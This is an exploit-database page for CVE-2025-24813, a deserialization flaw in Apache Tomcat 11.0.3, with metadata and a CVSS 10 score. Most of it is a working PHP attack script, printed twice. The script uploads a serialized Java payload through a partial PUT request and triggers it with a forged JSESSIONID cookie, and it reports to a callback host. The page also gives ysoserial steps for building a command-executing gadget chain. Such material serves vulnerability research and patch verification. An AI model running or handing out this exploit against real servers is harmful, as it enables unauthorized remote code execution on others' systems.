📄 Apache Tomcat 11.0.3 Remote Session Injection_PACKETSTORM:212102

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

A vulnerability in Apache Tomcat version 11.0.3 allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie...

Visit Original Source

Basic Information

ID PACKETSTORM:212102

Published Nov 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Apache Tomcat 11.0.3 Remote Session Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://tomcat.apache.org/ |
=============================================================================================================================================

[+] Summary :

A vulnerability allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie.

[+] References : ( CVE-2025-24813 )

1. Save the file as: poc.php

2. Edit the target:
```php
$target = "http://TARGET";

3.Execute: php poc.php

[+] POC

<?php
/*
CVE-2025-24813 – PHP Exploit
Author: Indoushka
Packet Storm Security
*/

function rand_filename($length = 6) {
$chars = 'abcdefghijklmnopqrstuvwxyz';
$name = '';
for ($i = 0; $i < $length; $i++) {
$name .= $chars[random_int(0, strlen($chars)-1)];
}
return $name;
}

function generate_payload($interact_url) {
// Java Serialized payload (replace with your custom gadget)
return "\xac\xed\x00\x05\x73\x72\x00\x04\x44\x75\x6d\x6d\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x78\x70";

}

function exploit($target, $interact_url) {

$filename = rand_filename();
$put_url = $target . "/" . $filename . ".session";
$get_url = $target . "/" . $filename;

echo "[+] Exploit for CVE-2025-24813\n";
echo "[+] By Indoushka\n\n";
echo "[+] Uploading payload to: $put_url\n";

$payload = generate_payload($interact_url);

$headers = [
"Content-Range: bytes 0-452/457",
"Content-Type: application/octet-stream"
];

$opts = [
'http' => [
'method' => "PUT",
'header' => implode("\r\n", $headers),
'content' => $payload,
'ignore_errors' => true
]
];

$context = stream_context_create($opts);
$result = @file_get_contents($put_url, false, $context);

preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $m);
$status = $m[1];

if ($status == 201) {
echo "[+] Payload uploaded successfully.\n";
} else {
echo "[-] Upload failed with status: $status\n";
return;
}

echo "[+] Triggering payload via: $get_url\n";

$opts2 = [
'http' => [
'method' => "GET",
'header' => "Cookie: JSESSIONID=.$filename\r\n",
'ignore_errors' => true
]
];

$context2 = stream_context_create($opts2);
@file_get_contents($get_url, false, $context2);

echo "[+] Trigger request sent. Check your Interactsh callback: $interact_url\n";
}

// ====== Interactive Shell ======
echo "[+] Exploit for CVE-2025-24813\n";
echo "[+] Made By Indoushka\n\n";

echo "Target URL: ";
$target = trim(fgets(STDIN));

echo "Interact URL: ";
$interact = trim(fgets(STDIN));

exploit($target, $interact);
?>

------------

Generating a gadgets chain:

Generate a Commons-Collections-4 payload to execute the command: whoami

java -jar ysoserial.jar CommonsCollections4 "whoami" > payload.bin

Convert it to hex or base64 for input into PHP : xxd -p payload.bin

Place it where: return "<hex serialized bytes>";

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-26T18:15:08",
    "description": "A vulnerability in Apache Tomcat version 11.0.3 allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie...",
    "published": "2025-11-26T00:00:00",
    "modified": "2025-11-26T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Apache Tomcat 11.0.3 Remote Session Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212102",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-24813"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Apache Tomcat 11.0.3 Remote Session Injection                                                                               |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://tomcat.apache.org/                                                                                                  |\n    =============================================================================================================================================\n    \n    [+] Summary : \n    \n    A vulnerability allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie.\n    \n    [+] References : ( CVE-2025-24813 ) \n    \n    1. Save the file as: poc.php\n    \n    2. Edit the target:\n    ```php\n    $target = \"http://TARGET\";\n    \n    3.Execute: php poc.php\n    \n    [+]  POC\n    \n    <?php\n    /*\n        CVE-2025-24813 \u2013 PHP Exploit \n        Author: Indoushka\n        Packet Storm Security \n    */\n    \n    function rand_filename($length = 6) {\n        $chars = 'abcdefghijklmnopqrstuvwxyz';\n        $name = '';\n        for ($i = 0; $i < $length; $i++) {\n            $name .= $chars[random_int(0, strlen($chars)-1)];\n        }\n        return $name;\n    }\n    \n    function generate_payload($interact_url) {\n        // Java Serialized payload (replace with your custom gadget)\n        return \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x04\\x44\\x75\\x6d\\x6d\\x79\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x78\\x70\";\n    \n    }\n    \n    function exploit($target, $interact_url) {\n    \n        $filename = rand_filename();\n        $put_url = $target . \"/\" . $filename . \".session\";\n        $get_url = $target . \"/\" . $filename;\n    \n        echo \"[+] Exploit for CVE-2025-24813\\n\";\n        echo \"[+] By Indoushka\\n\\n\";\n        echo \"[+] Uploading payload to: $put_url\\n\";\n    \n        $payload = generate_payload($interact_url);\n    \n        $headers = [\n            \"Content-Range: bytes 0-452/457\",\n            \"Content-Type: application/octet-stream\"\n        ];\n    \n        $opts = [\n            'http' => [\n                'method' => \"PUT\",\n                'header' => implode(\"\\r\\n\", $headers),\n                'content' => $payload,\n                'ignore_errors' => true\n            ]\n        ];\n    \n        $context = stream_context_create($opts);\n        $result = @file_get_contents($put_url, false, $context);\n    \n        preg_match('/HTTP\\/\\d\\.\\d\\s+(\\d+)/', $http_response_header[0], $m);\n        $status = $m[1];\n    \n        if ($status == 201) {\n            echo \"[+] Payload uploaded successfully.\\n\";\n        } else {\n            echo \"[-] Upload failed with status: $status\\n\";\n            return;\n        }\n    \n        echo \"[+] Triggering payload via: $get_url\\n\";\n    \n        $opts2 = [\n            'http' => [\n                'method' => \"GET\",\n                'header' => \"Cookie: JSESSIONID=.$filename\\r\\n\",\n                'ignore_errors' => true\n            ]\n        ];\n    \n        $context2 = stream_context_create($opts2);\n        @file_get_contents($get_url, false, $context2);\n    \n        echo \"[+] Trigger request sent. Check your Interactsh callback: $interact_url\\n\";\n    }\n    \n    // ====== Interactive Shell ======\n    echo \"[+] Exploit for CVE-2025-24813\\n\";\n    echo \"[+] Made By Indoushka\\n\\n\";\n    \n    echo \"Target URL: \";\n    $target = trim(fgets(STDIN));\n    \n    echo \"Interact URL: \";\n    $interact = trim(fgets(STDIN));\n    \n    exploit($target, $interact);\n    ?>\n    \n    \n    \n    ------------\n    \n    Generating a gadgets chain:\n    \n    Generate a Commons-Collections-4 payload to execute the command: whoami\n    \n    java -jar ysoserial.jar CommonsCollections4 \"whoami\" > payload.bin\n    \n    Convert it to hex or base64 for input into PHP : xxd -p payload.bin\n    \n    Place it where: return \"<hex serialized bytes>\";\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212102",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212102/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply